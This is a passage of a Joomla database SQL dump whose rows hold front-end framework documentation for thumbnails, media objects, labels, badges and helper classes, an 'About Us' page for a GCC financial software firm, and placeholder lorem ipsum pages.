images</strong>:</p>\r\n<pre class=\"prettyprint linenums\">\r\n<ul class=\"thumbnails block\">\r\n <li class=\"grid4\">\r\n <a href=\"#\" class=\"thumbnail\">\r\n <img src=\"http://placehold.it/300x200\" alt=\"\">\r\n </a>\r\n </li>\r\n ...\r\n</ul>\r\n</pre>\r\n <p>For custom HTML content in thumbnails, the markup changes slightly. To allow block level content anywhere, we swap the <code><a></code> for a <code><div></code> like so:</p>\r\n<pre class=\"prettyprint linenums\">\r\n<ul class=\"thumbnails\">\r\n <li class=\"grid4\">\r\n <div class=\"thumbnail block\">\r\n <img src=\"http://placehold.it/300x200\" alt=\"\">\r\n <h3>Thumbnail label</h3>\r\n <p>Thumbnail caption...</p>\r\n </div>\r\n </li>\r\n ...\r\n</ul>\r\n</pre>\r\n\r\n <h3>More examples</h3>\r\n <p>Explore all your options with the various grid classes available to you. You can also mix and match different sizes.</p>\r\n <ul class=\"thumbnails row-fluid\">\r\n <li class=\"grid4\">\r\n <div class=\"block\">\r\n <a href=\"#\" class=\"thumbnail\">\r\n <img src=\"http://placehold.it/360x270\" alt=\"\" />\r\n </a>\r\n </div>\r\n </li>\r\n <li class=\"grid3\">\r\n <div class=\"block\">\r\n <a href=\"#\" class=\"thumbnail\">\r\n <img src=\"http://placehold.it/260x120\" alt=\"\" />\r\n </a>\r\n </div>\r\n </li>\r\n <li class=\"grid2\">\r\n <div class=\"block\">\r\n <a href=\"#\" class=\"thumbnail\">\r\n <img src=\"http://placehold.it/160x120\" alt=\"\" />\r\n </a>\r\n </div>\r\n </li>\r\n <li class=\"grid3\">\r\n <div class=\"block\">\r\n <a href=\"#\" class=\"thumbnail\">\r\n <img src=\"http://placehold.it/260x120\" alt=\"\" />\r\n </a>\r\n </div>\r\n </li>\r\n <li class=\"grid2\">\r\n <div class=\"block\">\r\n <a href=\"#\" class=\"thumbnail\">\r\n <img src=\"http://placehold.it/160x120\" alt=\"\" />\r\n </a>\r\n </div>\r\n </li>\r\n </ul>\r\n\r\n </section>\r\n\r\n \r\n <section id=\"media\">\r\n \r\n <h2 class=\"title\">Media object</h2>\r\n \r\n <p class=\"lead\">Abstract object styles for building various types of components (like blog comments, Tweets, etc) that feature a left- or right-aligned image alongside textual content.</p>\r\n\r\n <h3>Default example</h3>\r\n <p>The default media allow to float a media object (images, video, audio) to the left or right of a content block.</p>\r\n <div class=\"bs-example\">\r\n <div class=\"media\">\r\n <a class=\"pull-left\" href=\"#\">\r\n <img class=\"media-object\" src=\"http://placehold.it/64x64\" />\r\n </a>\r\n <div class=\"media-body\">\r\n <h4 class=\"media-heading\">Media heading</h4>\r\n Cras sit amet nibh libero, in gravida nulla. Nulla vel metus scelerisque ante sollicitudin commodo. Cras purus odio, vestibulum in vulputate at, tempus viverra turpis. Fusce condimentum nunc ac nisi vulputate fringilla. Donec lacinia congue felis in faucibus.\r\n </div>\r\n </div>\r\n <div class=\"media\">\r\n <a class=\"pull-left\" href=\"#\">\r\n <img class=\"media-object\" src=\"http://placehold.it/64x64\" />\r\n </a>\r\n <div class=\"media-body\">\r\n <h4 class=\"media-heading\">Media heading</h4>\r\n Cras sit amet nibh libero, in gravida nulla. Nulla vel metus scelerisque ante sollicitudin commodo. Cras purus odio, vestibulum in vulputate at, tempus viverra turpis. Fusce condimentum nunc ac nisi vulputate fringilla. Donec lacinia congue felis in faucibus.\r\n <div class=\"media\">\r\n <a class=\"pull-left\" href=\"#\">\r\n <img class=\"media-object\" src=\"http://placehold.it/64x64\" />\r\n </a>\r\n <div class=\"media-body\">\r\n <h4 class=\"media-heading\">Media heading</h4>\r\n Cras sit amet nibh libero, in gravida nulla. Nulla vel metus scelerisque ante sollicitudin commodo. Cras purus odio, vestibulum in vulputate at, tempus viverra turpis. Fusce condimentum nunc ac nisi vulputate fringilla. Donec lacinia congue felis in faucibus.\r\n </div>\r\n </div>\r\n </div>\r\n </div>\r\n </div>\r\n<pre class=\"prettyprint linenums\">\r\n<div class=\"media\">\r\n <a class=\"pull-left\" href=\"#\">\r\n <img class=\"media-object\" src=\"http://placehold.it/64x64\">\r\n </a>\r\n <div class=\"media-body\">\r\n <h4 class=\"media-heading\">Media heading</h4>\r\n ...\r\n\r\n <!-- Nested media object -->\r\n <div class=\"media\">\r\n ...\r\n </div>\r\n </div>\r\n</div>\r\n</pre>\r\n\r\n\r\n <hr class=\"bs-separator\" />\r\n\r\n\r\n <h3>Media list</h3>\r\n <p>With a bit of extra markup, you can use media inside list (useful for comment threads or articles lists).</p>\r\n <div class=\"bs-example\">\r\n <ul class=\"media-list\">\r\n <li class=\"media\">\r\n <a class=\"pull-left\" href=\"#\">\r\n <img class=\"media-object\" src=\"http://placehold.it/64x64\" />\r\n </a>\r\n <div class=\"media-body\">\r\n <h4 class=\"media-heading\">Media heading</h4>\r\n <p>Cras sit amet nibh libero, in gravida nulla. Nulla vel metus scelerisque ante sollicitudin commodo. Cras purus odio, vestibulum in vulputate at, tempus viverra turpis.</p>\r\n \r\n <div class=\"media\">\r\n <a class=\"pull-left\" href=\"#\">\r\n <img class=\"media-object\" src=\"http://placehold.it/64x64\" />\r\n </a>\r\n <div class=\"media-body\">\r\n <h4 class=\"media-heading\">Nested media heading</h4>\r\n Cras sit amet nibh libero, in gravida nulla. Nulla vel metus scelerisque ante sollicitudin commodo. Cras purus odio, vestibulum in vulputate at, tempus viverra turpis.\r\n \r\n <div class=\"media\">\r\n <a class=\"pull-left\" href=\"#\">\r\n <img class=\"media-object\" src=\"http://placehold.it/64x64\" />\r\n </a>\r\n <div class=\"media-body\">\r\n <h4 class=\"media-heading\">Nested media heading</h4>\r\n Cras sit amet nibh libero, in gravida nulla. Nulla vel metus scelerisque ante sollicitudin commodo. Cras purus odio, vestibulum in vulputate at, tempus viverra turpis.\r\n </div>\r\n </div>\r\n </div>\r\n </div>\r\n \r\n <div class=\"media\">\r\n <a class=\"pull-left\" href=\"#\">\r\n <img class=\"media-object\" src=\"http://placehold.it/64x64\" />\r\n </a>\r\n <div class=\"media-body\">\r\n <h4 class=\"media-heading\">Nested media heading</h4>\r\n Cras sit amet nibh libero, in gravida nulla. Nulla vel metus scelerisque ante sollicitudin commodo. Cras purus odio, vestibulum in vulputate at, tempus viverra turpis.\r\n </div>\r\n </div>\r\n </div>\r\n </li>\r\n <li class=\"media\">\r\n <a class=\"pull-right\" href=\"#\">\r\n <img class=\"media-object\" src=\"http://placehold.it/64x64\" />\r\n </a>\r\n <div class=\"media-body\">\r\n <h4 class=\"media-heading\">Media heading</h4>\r\n Cras sit amet nibh libero, in gravida nulla. Nulla vel metus scelerisque ante sollicitudin commodo. Cras purus odio, vestibulum in vulputate at, tempus viverra turpis.\r\n </div>\r\n </li>\r\n </ul>\r\n </div>\r\n<pre class=\"prettyprint linenums\">\r\n<ul class=\"media-list\">\r\n <li class=\"media\">\r\n <a class=\"pull-left\" href=\"#\">\r\n <img class=\"media-object\" src=\"http://placehold.it/64x64\">\r\n </a>\r\n <div class=\"media-body\">\r\n <h4 class=\"media-heading\">Media heading</h4>\r\n ...\r\n\r\n <!-- Nested media object -->\r\n <div class=\"media\">\r\n ...\r\n </div>\r\n </div>\r\n </li>\r\n</ul>\r\n</pre>\r\n\r\n</section>','',1,78,'2012-11-21 08:27:31',736,'','2012-11-21 09:06:32',42,0,'0000-00-00 00:00:00','2012-11-21 08:27:31','0000-00-00 00:00:00','{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":null,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":null,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":null,\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',4,2,'','',1,64,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',0,'*',''),(82,189,'Label & Badges','label-badges','\r\n <section id=\"labels-badges\">\r\n \r\n <h1 class=\"title\">Labels and badges</h1>\r\n \r\n <h2>Labels</h2>\r\n <table class=\"table table-bordered table-striped\">\r\n <thead>\r\n <tr>\r\n <th>Labels</th>\r\n <th>Markup</th>\r\n </tr>\r\n </thead>\r\n <tbody>\r\n <tr>\r\n <td>\r\n <span class=\"label\">Default</span>\r\n </td>\r\n <td>\r\n <code><span class=\"label\">Default</span></code>\r\n </td>\r\n </tr>\r\n <tr>\r\n <td>\r\n <span class=\"label label-success\">Success</span>\r\n </td>\r\n <td>\r\n <code><span class=\"label label-success\">Success</span></code>\r\n </td>\r\n </tr>\r\n <tr>\r\n <td>\r\n <span class=\"label label-warning\">Warning</span>\r\n </td>\r\n <td>\r\n <code><span class=\"label label-warning\">Warning</span></code>\r\n </td>\r\n </tr>\r\n <tr>\r\n <td>\r\n <span class=\"label label-important\">Important</span>\r\n </td>\r\n <td>\r\n <code><span class=\"label label-important\">Important</span></code>\r\n </td>\r\n </tr>\r\n <tr>\r\n <td>\r\n <span class=\"label label-info\">Info</span>\r\n </td>\r\n <td>\r\n <code><span class=\"label label-info\">Info</span></code>\r\n </td>\r\n </tr>\r\n <tr>\r\n <td>\r\n <span class=\"label label-inverse\">Inverse</span>\r\n </td>\r\n <td>\r\n <code><span class=\"label label-inverse\">Inverse</span></code>\r\n </td>\r\n </tr>\r\n </tbody>\r\n </table>\r\n\r\n <h2>Badges</h2>\r\n <table class=\"table table-bordered table-striped\">\r\n <thead>\r\n <tr>\r\n <th>Name</th>\r\n <th>Example</th>\r\n <th>Markup</th>\r\n </tr>\r\n </thead>\r\n <tbody>\r\n <tr>\r\n <td>\r\n Default\r\n </td>\r\n <td>\r\n <span class=\"badge\">1</span>\r\n </td>\r\n <td>\r\n <code><span class=\"badge\">1</span></code>\r\n </td>\r\n </tr>\r\n <tr>\r\n <td>\r\n Success\r\n </td>\r\n <td>\r\n <span class=\"badge badge-success\">2</span>\r\n </td>\r\n <td>\r\n <code><span class=\"badge badge-success\">2</span></code>\r\n </td>\r\n </tr>\r\n <tr>\r\n <td>\r\n Warning\r\n </td>\r\n <td>\r\n <span class=\"badge badge-warning\">4</span>\r\n </td>\r\n <td>\r\n <code><span class=\"badge badge-warning\">4</span></code>\r\n </td>\r\n </tr>\r\n <tr>\r\n <td>\r\n Important\r\n </td>\r\n <td>\r\n <span class=\"badge badge-important\">6</span>\r\n </td>\r\n <td>\r\n <code><span class=\"badge badge-important\">6</span></code>\r\n </td>\r\n </tr>\r\n <tr>\r\n <td>\r\n Info\r\n </td>\r\n <td>\r\n <span class=\"badge badge-info\">8</span>\r\n </td>\r\n <td>\r\n <code><span class=\"badge badge-info\">8</span></code>\r\n </td>\r\n </tr>\r\n <tr>\r\n <td>\r\n Inverse\r\n </td>\r\n <td>\r\n <span class=\"badge badge-inverse\">10</span>\r\n </td>\r\n <td>\r\n <code><span class=\"badge badge-inverse\">10</span></code>\r\n </td>\r\n </tr>\r\n </tbody>\r\n </table>\r\n\r\n </section>','',1,78,'2012-11-21 08:54:20',736,'','0000-00-00 00:00:00',0,0,'0000-00-00 00:00:00','2012-11-21 08:54:20','0000-00-00 00:00:00','{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":null,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":null,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":null,\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',1,1,'','',1,68,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',0,'*',''),(83,190,'Misc','misc',' <h1 class=\"title\">Miscellaneous <small>Lightweight utility components</small></h1>\r\n \r\n <section id=\"typography\">\r\n \r\n <h2>Typographic components</h2>\r\n \r\n\r\n <h3>Hero unit</h3>\r\n <p>A lightweight, flexible component to showcase key content on your site. It works well on marketing and content-heavy sites.</p>\r\n <div class=\"bs-example\">\r\n <div class=\"hero-unit\">\r\n <h1>Hello, world!</h1>\r\n <p>This is a simple hero unit, a simple jumbotron-style component for calling extra attention to featured content or information.</p>\r\n <p><a class=\"btn btn-primary btn-large\">Learn more</a></p>\r\n </div>\r\n </div>\r\n<pre class=\"prettyprint linenums\">\r\n<div class=\"hero-unit\">\r\n <h1>Heading</h1>\r\n <p>Tagline</p>\r\n <p>\r\n <a class=\"btn btn-primary btn-large\">\r\n Learn more\r\n </a>\r\n </p>\r\n</div>\r\n</pre>\r\n\r\n <h3>Page header</h3>\r\n <p>A simple shell for an <code>h1</code> to appropriately space out and segment sections of content on a page. It can utilize the <code>h1</code>\'s default <code>small</code>, element as well most other components (with additional styles).</p>\r\n <div class=\"bs-example\">\r\n <div class=\"page-header\">\r\n <h1>Example page header <small>Subtext for header</small></h1>\r\n </div>\r\n </div>\r\n<pre class=\"prettyprint linenums\">\r\n<div class=\"page-header\">\r\n <h1>Example page header <small>Subtext for header</small></h1>\r\n</div>\r\n</pre>\r\n\r\n </section>\r\n\r\n \r\n <section id=\"misc\">\r\n \r\n <h2>Wells</h2>\r\n <p>Use the well as a simple effect on an element to give it an inset effect.</p>\r\n <div class=\"bs-example\">\r\n <div class=\"well\">\r\n Look, I\'m in a well!\r\n </div>\r\n </div>\r\n<pre class=\"prettyprint linenums\">\r\n<div class=\"well\">\r\n ...\r\n</div>\r\n</pre>\r\n <h3>Optional classes</h3>\r\n <p>Control padding and rounded corners with two optional modifier classes.</p>\r\n <div class=\"bs-example\">\r\n <div class=\"well well-large\">\r\n Look, I\'m in a well!\r\n </div>\r\n </div>\r\n<pre class=\"prettyprint linenums\">\r\n<div class=\"well well-large\">\r\n ...\r\n</div>\r\n</pre>\r\n <div class=\"bs-example\">\r\n <div class=\"well well-small\">\r\n Look, I\'m in a well!\r\n </div>\r\n </div>\r\n<pre class=\"prettyprint linenums\">\r\n<div class=\"well well-small\">\r\n ...\r\n</div>\r\n</pre>\r\n\r\n <h2>Helper classes</h2>\r\n <p>Simple, focused classes for small display or behavior tweaks.</p>\r\n\r\n <h4>.pull-left</h4>\r\n <p>Float an element left</p>\r\n<pre class=\"prettyprint linenums\">\r\nclass=\"pull-left\"\r\n</pre>\r\n<pre class=\"prettyprint linenums\">\r\n.pull-left {\r\n float: left;\r\n marginr-right: 15px;\r\n}\r\n</pre>\r\n\r\n <h4>.pull-right</h4>\r\n <p>Float an element right</p>\r\n<pre class=\"prettyprint linenums\">\r\nclass=\"pull-right\"\r\n</pre>\r\n<pre class=\"prettyprint linenums\">\r\n.pull-right {\r\n float: right;\r\n margin-left: 15px;\r\n}\r\n</pre>\r\n\r\n <h4>.muted</h4>\r\n <p>Change an element\'s color to <code>#999</code></p>\r\n<pre class=\"prettyprint linenums\">\r\nclass=\"muted\"\r\n</pre>\r\n<pre class=\"prettyprint linenums\">\r\n.muted {\r\n color: #999;\r\n}\r\n</pre>\r\n\r\n <h4>.clearfix</h4>\r\n <p>Clear the <code>float</code> on any element</p>\r\n<pre class=\"prettyprint linenums\">\r\nclass=\"clearfix\"\r\n</pre>\r\n<pre class=\"prettyprint linenums\">\r\n.clearfix {\r\n *zoom: 1;\r\n &:before,\r\n &:after {\r\n display: table;\r\n content: \"\";\r\n }\r\n &:after {\r\n clear: both;\r\n }\r\n}\r\n</pre>\r\n\r\n </section>','',1,78,'2012-11-21 09:00:40',736,'','2012-11-21 09:02:15',42,0,'0000-00-00 00:00:00','2012-11-21 09:00:40','0000-00-00 00:00:00','{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":null,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":null,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":null,\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',3,0,'','',1,61,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',0,'*',''),(84,192,'About Us','about-us','<p style=\"text-align: justify;\"><span style=\"color: #000000; font-family: Times New Roman; font-size: medium;\"> </span><span lang=\"EN-GB\" style=\"line-height: 150%; font-family: \'Century Gothic\',\'sans-serif\'; font-size: 10pt; mso-ansi-language: EN-GB;\"><span style=\"color: #000000;\">Established in 1999, <strong>FIRST Information Technology (FIT)</strong> is a software solutions provider based in the GCC with offices in Oman, UAE and Jordan, partners in Saudi Arabia, Qatar, Egypt and Syria. Focused on the financial services products - markets sector - mainly investment management solutions (brokerage, fund management, portfolio management, order management solution, risk management, index management, information dissemination and other industry specific solutions)</span></span></p>\r\n<p style=\"text-align: justify;\"><span lang=\"EN-GB\" style=\"color: black; line-height: 150%; font-family: \'Century Gothic\',\'sans-serif\'; font-size: 10pt; mso-ansi-language: EN-GB;\">FIT as a leader solution provider in the region, has the largest portfolio clients based in the GCC. <strong>FIT</strong> was the first provider hits the Trading Engine for Muscat, Dubai, Abu Dhabi, NASDAQ Dubai, Qatar, Jordan and Damascus Stock Exchanges.</span></p>\r\n<p style=\"text-align: justify;\"><span lang=\"EN-GB\" style=\"color: black; line-height: 150%; font-family: \'Century Gothic\',\'sans-serif\'; font-size: 10pt; mso-ansi-language: EN-GB;\">The core solutions provided by </span><b><span lang=\"EN-GB\" style=\"color: blue; line-height: 150%; font-family: \'Century Gothic\',\'sans-serif\'; font-size: 10pt; mso-ansi-language: EN-GB;\">FIT</span></b><span lang=\"EN-GB\" style=\"color: black; line-height: 150%; font-family: \'Century Gothic\',\'sans-serif\'; font-size: 10pt; mso-ansi-language: EN-GB;\"> offer the widest breadth of functionality in the region.<span style=\"mso-spacerun: yes;\"> </span>The functionality encompasses the following: brokerage management, portfolio management, fund management, research, order management, index management, FIX protocol, STP integration, portals, and internet / mobile trading, risk management, VIP service centre.</span></p>\r\n<p style=\"text-align: justify;\"><span lang=\"EN-GB\" style=\"color: black; line-height: 150%; font-family: \'Century Gothic\',\'sans-serif\'; font-size: 10pt; mso-ansi-language: EN-GB;\">FIT is working closely with the regional stock exchanges either as consultant or solution provider such as Dubai Financial Market portal, information dissemination website, Muscat Securities Marker website and Khartoum Stock Exchange trading engine. </span></p>\r\n<p> </p>\r\n<p><span style=\"color: #632423; font-family: \'Century Gothic\',\'sans-serif\'; font-size: 16pt; mso-bidi-font-family: Tahoma; mso-themecolor: accent2; mso-themeshade: 128;\"><span style=\"color: #632423; font-family: \'Century Gothic\',\'sans-serif\'; font-size: 16pt; mso-bidi-font-family: Tahoma; mso-themecolor: accent2; mso-themeshade: 128;\"><strong><span style=\"text-decoration: underline;\">Vision</span></strong></span></span></p>\r\n<table style=\"border-collapse: collapse; width: 1343pt;\" border=\"0\" width=\"1790\" cellspacing=\"0\" cellpadding=\"0\">\r\n<tbody>\r\n<tr style=\"height: 15.0pt;\">\r\n<td style=\"height: 15.0pt; width: 1343pt;\" width=\"1790\" height=\"20\">\r\n<p style=\"padding-left: 30px;\"> <span style=\"color: black; font-family: \'Britannic Bold\',\'sans-serif\'; mso-bidi-font-family: Tahoma; mso-bidi-font-size: 12.0pt;\"><span style=\"font-size: medium;\">Be the regional selected choice of technology partner in delivering Brokerage & Financial Investment Applications.</span></span></p>\r\n<p style=\"padding-left: 30px;\"> </p>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<p><span style=\"color: #632423; font-family: \'Century Gothic\',\'sans-serif\'; font-size: 16pt; mso-bidi-font-family: Tahoma; mso-themecolor: accent2; mso-themeshade: 128;\"><strong><span style=\"text-decoration: underline;\">Mission</span></strong></span></p>\r\n<table style=\"border-collapse: collapse; width: 1343pt;\" border=\"0\" width=\"1790\" cellspacing=\"0\" cellpadding=\"0\">\r\n<tbody>\r\n<tr style=\"height: 15.0pt;\">\r\n<td style=\"height: 15pt; width: 1343pt; padding-left: 30px;\" width=\"1790\" height=\"20\">\r\n<p style=\"margin: 0in 0in 0pt; text-align: justify;\"> </p>\r\n<p style=\"margin: 0in 0in 0pt; text-align: justify;\"><span style=\"color: black; font-family: \'Britannic Bold\',\'sans-serif\'; mso-bidi-font-family: Tahoma; mso-bidi-font-size: 12.0pt;\"><span style=\"font-size: medium;\">Provide better services to enhance the operational efficiency of our clients. This statement served as a cornerstone for maximizing the added value we deliver to our clients.</span></span></p>\r\n<p style=\"margin: 0in 0in 0pt; text-align: justify;\"><span style=\"font-family: Times New Roman; font-size: medium;\"> </span></p>\r\n<p style=\"margin: 0in 0in 0pt; text-align: justify;\"><span style=\"color: black; font-family: \'Britannic Bold\',\'sans-serif\'; mso-bidi-font-family: Tahoma; mso-bidi-font-size: 12.0pt;\"><span style=\"font-size: medium;\">Having this in mind and in order to bring the state of art technology to our region, we established the FIRST Information Technology FIT to achieve those goals among others. We look at information and data of any enterprise as part of its valuable assets, so it has to be preserved, maintained, and fully taken care off. By providing Investment solutions to the enterprise, we believe we will accomplish our mission. The systems and software applications that we developed take care of the current needs as well as the future expansions and requirements without loosing the investment in both hardware and software.</span></span></p>\r\n<p style=\"margin: 0in 0in 0pt; text-align: justify;\"><span style=\"font-family: Times New Roman; font-size: medium;\"> </span></p>\r\n<p style=\"margin: 0in 0in 0pt; text-align: justify;\"> </p>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<p> </p>','',1,79,'2013-12-09 05:09:51',736,'','2015-04-08 08:43:16',736,0,'0000-00-00 00:00:00','2013-12-09 05:09:51','0000-00-00 00:00:00','{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_tags\":\"\",\"show_intro\":\"\",\"info_block_position\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',25,8,'','',1,2069,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',0,'*',''),(85,193,'Meet The Team','meet-the-team','<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Fusce at purus quis enim sollicitudin tempus. Aliquam imperdiet elit sit amet diam hendrerit, eget rutrum mauris volutpat. Quisque semper tortor sed auctor aliquet. Sed scelerisque, tellus id pharetra lacinia, felis eros semper velit, et rhoncus metus elit sit amet lectus. Donec condimentum sit amet massa convallis adipiscing. Sed ut pharetra lectus. Ut lacinia dolor erat, eget posuere nisi consectetur ac. Duis iaculis sed elit at tincidunt. Praesent iaculis ornare enim nec tempor. Aenean sit amet tempus nunc, at varius est. Nulla porttitor placerat dolor quis blandit. Donec nec sollicitudin purus, ac faucibus magna. Etiam ut varius purus.</p>','',1,79,'2013-12-09 11:08:46',736,'','2015-03-12 10:16:52',736,736,'2015-03-12 10:22:55','2013-12-09 11:08:46','0000-00-00 00:00:00','{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_tags\":\"\",\"show_intro\":\"\",\"info_block_position\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',6,7,'','',1,87,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',0,'*',''),(86,194,'Services Page - 1','services-page-1','sdsd','',-2,14,'2013-12-09 11:09:09',736,'','0000-00-00 00:00:00',0,0,'0000-00-00 00:00:00','2013-12-09 11:09:09','0000-00-00 00:00:00','{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',1,0,'','',1,0,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',0,'*',''),(87,197,'Responsive Joomla Template','responsive-joomla-template','<p>\r\nLorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged. It was popularised in the 1960s with the release of Letraset sheets containing Lorem Ipsum passages, and more recently with desktop publishing software like Aldus PageMaker including versions of Lorem Ipsum.\r\n</p>','',1,80,'2013-12-10 06:36:38',736,'','2013-12-10 06:36:54',462,0,'0000-00-00 00:00:00','2013-12-10 06:36:38','0000-00-00 